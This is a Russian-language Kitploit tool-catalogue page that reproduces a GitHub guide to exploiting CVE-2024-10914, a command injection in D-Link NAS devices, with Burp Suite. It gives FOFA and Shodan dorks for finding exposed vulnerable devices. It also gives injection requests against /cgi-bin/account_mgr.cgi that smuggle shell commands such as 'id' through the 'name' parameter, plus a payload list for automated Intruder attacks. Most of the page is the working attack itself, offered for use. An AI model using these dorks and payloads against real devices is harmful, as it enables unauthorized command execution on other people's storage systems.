Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10914 — CVE-2024-10914_Manual testing with burpsuite | Kitploit
Инструменты/GitHubGitHub/egi08/cve-2024-10914
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingCommand and Control
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_Manual testing with burpsuite

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-10914 Тестирование уязвимости внедрения команд для D-Link NAS_Ручное тестирование с помощью Burp Suite


Дорк для поиска уязвимых устройств

Используйте следующий поисковый дорк для нахождения потенциально уязвимых устройств D-Link NAS:

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

Эта поисковая строка помогает выявить устройства, работающие под управлением уязвимого приложения D-Link DNS ShareCenter с конкретной версией сервера Lighttpd, подверженной данной уязвимости.


Данное руководство предоставляет пошаговые инструкции по ручному тестированию уязвимости внедрения команд (CVE-2024-10914) в параметре name D-Link NAS с помощью Burp Suite. Целевой URL: http://Target.

Предварительные требования

  • Burp Suite
  • Веб-браузер, настроенный на использование Burp Suite в качестве прокси (обычно устанавливается на 127.0.0.1:8080)

Шаг 1: Настройка Burp Suite

  1. Запустите Burp Suite: Запустите Burp Suite на вашей машине.
  2. Настройте прокси: Убедитесь, что браузер настроен на использование Burp Suite в качестве прокси, установив параметры прокси браузера на 127.0.0.1 порт 8080.

Шаг 2: Перехват запроса

  1. Перейдите к целевому ресурсу: В браузере откройте http://Target.
  2. Включите перехват: В Burp Suite включите функцию перехвата, чтобы захватить исходящий запрос.

Шаг 3: Изменение запроса

  1. Найдите уязвимый параметр: В перехваченном запросе найдите параметр name в URL. Он должен выглядеть следующим образом:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. Вставьте тестовую команду: Измените параметр name, включив в него тестовую команду, например echo "test":

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. Отправьте изменённый запрос: Перешлите изменённый запрос на сервер.


Шаг 4: Анализ ответа

  1. Проверьте ответ: Ищите в ответе вывод внедрённой команды. Например, если сервер выполнил echo "test", вы должны увидеть:

    root@kitploit:~
    test
    

Шаг 5: Эксплуатация уязвимости

  1. Внедрите вредоносную команду: Если тест успешен, попробуйте более сложные команды, например:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. Отправьте эксплойт-запрос: Перешлите этот запрос на сервер.

  3. Проанализируйте ответ: Проверьте, присутствует ли в ответе вывод команды (например, информация об идентификаторе пользователя).


Шаг 6: Автоматизация с помощью расширений Burp Suite (опционально)

  1. Используйте Intruder: Автоматизируйте тестирование с помощью инструмента Intruder в Burp Suite.

    • Щёлкните правой кнопкой мыши по запросу и выберите Отправить в Intruder.
    • Установите параметр name как позицию для загрузки.
    • Используйте список команд в качестве полезных нагрузок для тестирования.
  2. Примеры полезных нагрузок:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Запустите Intruder: Запустите атаку Intruder для автоматического тестирования нескольких полезных нагрузок.

Скачать инструмент